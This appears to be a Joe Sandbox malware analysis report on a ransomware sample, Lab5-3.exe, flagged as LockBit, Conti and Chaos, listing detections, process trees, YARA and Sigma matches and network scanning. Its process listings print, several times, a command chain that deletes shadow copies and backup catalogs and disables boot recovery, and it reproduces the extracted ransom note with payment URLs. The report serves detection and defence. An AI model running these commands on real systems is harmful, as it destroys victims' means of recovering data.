Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lab5-3.exe

Overview

General Information

Sample name:Lab5-3.exe
Analysis ID:1432380
MD5:69bec32d50744293e85606a5e8f80425
SHA1:101b90ac7e0c2a8b570686c13dfa0e161ddd00e0
SHA256:95739e350d7f2aca2c609768ee72ad67fcf05efca5c7ad8df3027c82b9c454cf
Infos:

Detection

Chaos, Conti, LockBit ransomware, TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
Yara detected Chaos Ransomware
Yara detected Conti ransomware
Yara detected LockBit ransomware
Yara detected RansomwareGeneric
Yara detected TrojanRansom
Yara detected UAC Bypass using CMSTP
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Contains functionalty to change the wallpaper
Creates files inside the volume driver (system volume information)
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Found Tor onion address
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Spreads via windows shares (copies files to share folders)
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious desktop.ini Action
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • Lab5-3.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\Lab5-3.exe" MD5: 69BEC32D50744293E85606A5E8F80425)
    • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 8808 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 9856 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • bcdedit.exe (PID: 10060 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 10076 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • wbadmin.exe (PID: 10092 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
  • chrome.exe (PID: 8952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 9188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,10208007017991637576,12589176499533245041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • wbengine.exe (PID: 10124 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 17270A354A66590953C4AAC1CF54E507)
  • vdsldr.exe (PID: 10168 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • vds.exe (PID: 10208 cmdline: C:\Windows\System32\vds.exe MD5: 0781CE7ECCD9F6318BA72CD96B5B8992)
  • Lab5-3.exe (PID: 9836 cmdline: "C:\Users\user\Desktop\Lab5-3.exe" MD5: 69BEC32D50744293E85606A5E8F80425)
    • conhost.exe (PID: 9728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lab5-3.exe (PID: 9756 cmdline: "C:\Users\user\Desktop\Lab5-3.exe" MD5: 69BEC32D50744293E85606A5E8F80425)
    • conhost.exe (PID: 9380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 11060 cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 11108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 11168 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 10180 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • bcdedit.exe (PID: 9556 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 11804 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • wbadmin.exe (PID: 11920 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 12008 cmdline: /c vssadmin Delete Shadows /All /Quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 12016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 12056 cmdline: vssadmin Delete Shadows /All /Quiet MD5: B58073DB8892B67A672906C9358020EC)
    • cmd.exe (PID: 12092 cmdline: /c bcdedit /set {default} recoveryenabled No MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 12132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 12148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 12192 cmdline: bcdedit /set {default} recoveryenabled No MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 12180 cmdline: /c bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 11172 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 7720 cmdline: /c wbadmin DELETE SYSTEMSTATEBACKUP MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 12232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 10008 cmdline: /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Lab5-3.exe (PID: 10188 cmdline: "C:\Users\user\Desktop\Lab5-3.exe" MD5: 69BEC32D50744293E85606A5E8F80425)
    • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lab5-3.exe (PID: 11204 cmdline: "C:\Users\user\Desktop\Lab5-3.exe" MD5: 69BEC32D50744293E85606A5E8F80425)
    • conhost.exe (PID: 9464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 11816 cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 11840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 11896 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
        • Conhost.exe (PID: 9816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 12084 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • bcdedit.exe (PID: 12224 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 4048 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • wbadmin.exe (PID: 11992 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 12116 cmdline: /c vssadmin Delete Shadows /All /Quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 12216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 12268 cmdline: vssadmin Delete Shadows /All /Quiet MD5: B58073DB8892B67A672906C9358020EC)
    • cmd.exe (PID: 8964 cmdline: /c bcdedit /set {default} recoveryenabled No MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 11796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 11748 cmdline: bcdedit /set {default} recoveryenabled No MD5: 74F7B84B0A547592CA63A00A8C4AD583)
        • Conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 11808 cmdline: /c bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 11852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 5548 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 11788 cmdline: /c wbadmin DELETE SYSTEMSTATEBACKUP MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wbadmin.exe (PID: 5024 cmdline: wbadmin DELETE SYSTEMSTATEBACKUP MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 10172 cmdline: /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 11944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wbadmin.exe (PID: 12072 cmdline: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 11140 cmdline: /c wmic SHADOWCOPY /nointeractive MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 12080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 12212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ChaosIn-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.chaos
NameDescriptionAttributionBlogpost URLsLink
Conti, Conti LockConti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.conti
{"URL": "http://lockbitks2tvnmwk.onion", "Ransom Note": "All your important files are encrypted!\r\nAny attempts to restore your files with the thrid-party software will be fatal for your files!\r\nRESTORE YOU DATA POSIBLE ONLY BUYING private key from us.\r\nThere is only one way to get your files back:\r\n\r\n1) Through a standard browser(FireFox, Chrome, Edge, Opera)\r\n| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50\r\n| 2. Follow the instructions on this page\r\n\r\n\r\n2) Through a Tor Browser - recommended\r\n| 1. Download Tor browser - https://www.torproject.org/ and install it.\r\n| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50\r\n\t This link only works in Tor Browser! \r\n| 3. Follow the instructions on this page\r\n\r\n\r\n ###  Attention! ###\r\n # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site\r\n # Do not rename encrypted files.\r\n # Do not try to decrypt using third party software, it may cause permanent data loss.\r\n # Decryption of your files with the help of third parties may cause increased price(they add their fee to our).\r\n # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN.\r\n # Tor Browser user manual https://tb-manual.torproject.org/about"}
SourceRuleDescriptionAuthorStrings
Lab5-3.exeJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
    Lab5-3.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      Lab5-3.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x22968:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x2442e:$s1: CoGetObject
      • 0x2292c:$s2: Elevation:Administrator!new:
      Lab5-3.exeINDICATOR_SUSPICOUS_EXE_References_VEEAMDetects executables containing many references to VEEAM. Observed in ransomwareunknown
      • 0x21968:$s1: VeeamNFSSvc
      • 0x2193c:$s9: VeeamTransportSvc
      • 0x21950:$s10: VeeamDeploymentService
      SourceRuleDescriptionAuthorStrings
      00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
        00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
            00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
                Click to see the 31 entries
                SourceRuleDescriptionAuthorStrings
                0.0.Lab5-3.exe.400000.0.unpackJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
                  0.0.Lab5-3.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.0.Lab5-3.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x22968:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x2442e:$s1: CoGetObject
                    • 0x2292c:$s2: Elevation:Administrator!new:
                    0.0.Lab5-3.exe.400000.0.unpackINDICATOR_SUSPICOUS_EXE_References_VEEAMDetects executables containing many references to VEEAM. Observed in ransomwareunknown
                    • 0x21968:$s1: VeeamNFSSvc
                    • 0x2193c:$s9: VeeamTransportSvc
                    • 0x21950:$s10: VeeamDeploymentService
                    34.2.Lab5-3.exe.400000.0.unpackJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
                      Click to see the 31 entries

                      Operating System Destruction

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Lab5-3.exe", ParentImage: C:\Users\user\Desktop\Lab5-3.exe, ParentProcessId: 7476, ParentProcessName: Lab5-3.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 7632, ProcessName: cmd.exe

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 8808, ProcessName: vssadmin.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\Desktop\Lab5-3.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Lab5-3.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Lab5-3.exe", ParentImage: C:\Users\user\Desktop\Lab5-3.exe, ParentProcessId: 7476, ParentProcessName: Lab5-3.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 7632, ProcessName: cmd.exe
                      Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\Lab5-3.exe, ProcessId: 7476, TargetFilename: Y:\$RECYCLE.BIN\desktop.ini
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Lab5-3.exeAvira: detected
                      Source: http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50Avira URL Cloud: Label: malware
                      Source: http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50Avira URL Cloud: Label: malware
                      Source: http://lockbitks2tvnmwk.onion/?Avira URL Cloud: Label: malware
                      Source: http://lockbit-decryptor.top/?Avira URL Cloud: Label: malware
                      Source: Restore-My-Files.txt72.0.drMalware Configuration Extractor: Lockbit {"URL": "http://lockbitks2tvnmwk.onion", "Ransom Note": "All your important files are encrypted!\r\nAny attempts to restore your files with the thrid-party software will be fatal for your files!\r\nRESTORE YOU DATA POSIBLE ONLY BUYING private key from us.\r\nThere is only one way to get your files back:\r\n\r\n1) Through a standard browser(FireFox, Chrome, Edge, Opera)\r\n| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50\r\n| 2. Follow the instructions on this page\r\n\r\n\r\n2) Through a Tor Browser - recommended\r\n| 1. Download Tor browser - https://www.torproject.org/ and install it.\r\n| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50\r\n\t This link only works in Tor Browser! \r\n| 3. Follow the instructions on this page\r\n\r\n\r\n ### Attention! ###\r\n # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site\r\n # Do not rename encrypted files.\r\n # Do not try to decrypt using third party software, it may cause permanent data loss.\r\n # Decryption of your files with the help of third parties may cause increased price(they add their fee to our).\r\n # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN.\r\n # Tor Browser user manual https://tb-manual.torproject.org/about"}
                      Source: Lab5-3.exeReversingLabs: Detection: 96%
                      Source: Lab5-3.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00418620 malloc,RegCreateKeyExA,RegQueryValueExA,RegQueryValueExA,Sleep,RegCloseKey,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,malloc,CryptBinaryToStringA,CharUpperA,CryptBinaryToStringA,CharUpperA,free,19_2_00418620
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00412920 LoadLibraryA,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,GetProcAddress,CryptAcquireContextW,19_2_00412920
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00418620 malloc,RegCreateKeyExA,RegQueryValueExA,RegQueryValueExA,Sleep,RegCloseKey,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,malloc,CryptBinaryToStringA,CharUpperA,CryptBinaryToStringA,CharUpperA,free,27_2_00418620
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00412920 LoadLibraryA,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,GetProcAddress,CryptAcquireContextW,27_2_00412920

                      Exploits

                      barindex
                      Source: Yara matchFile source: Lab5-3.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 7476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9836, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 10188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 11204, type: MEMORYSTR
                      Source: global trafficTCP traffic: 192.168.2.148:135
                      Source: global trafficTCP traffic: 192.168.2.149:135
                      Source: global trafficTCP traffic: 192.168.2.146:135
                      Source: global trafficTCP traffic: 192.168.2.147:135
                      Source: global trafficTCP traffic: 192.168.2.140:135
                      Source: global trafficTCP traffic: 192.168.2.141:135
                      Source: global trafficTCP traffic: 192.168.2.144:135
                      Source: global trafficTCP traffic: 192.168.2.145:135
                      Source: global trafficTCP traffic: 192.168.2.142:135
                      Source: global trafficTCP traffic: 192.168.2.143:135
                      Source: global trafficTCP traffic: 192.168.2.159:135
                      Source: global trafficTCP traffic: 192.168.2.157:135
                      Source: global trafficTCP traffic: 192.168.2.158:135
                      Source: global trafficTCP traffic: 192.168.2.151:135
                      Source: global trafficTCP traffic: 192.168.2.152:135
                      Source: global trafficTCP traffic: 192.168.2.150:135
                      Source: global trafficTCP traffic: 192.168.2.155:135
                      Source: global trafficTCP traffic: 192.168.2.156:135
                      Source: global trafficTCP traffic: 192.168.2.153:135
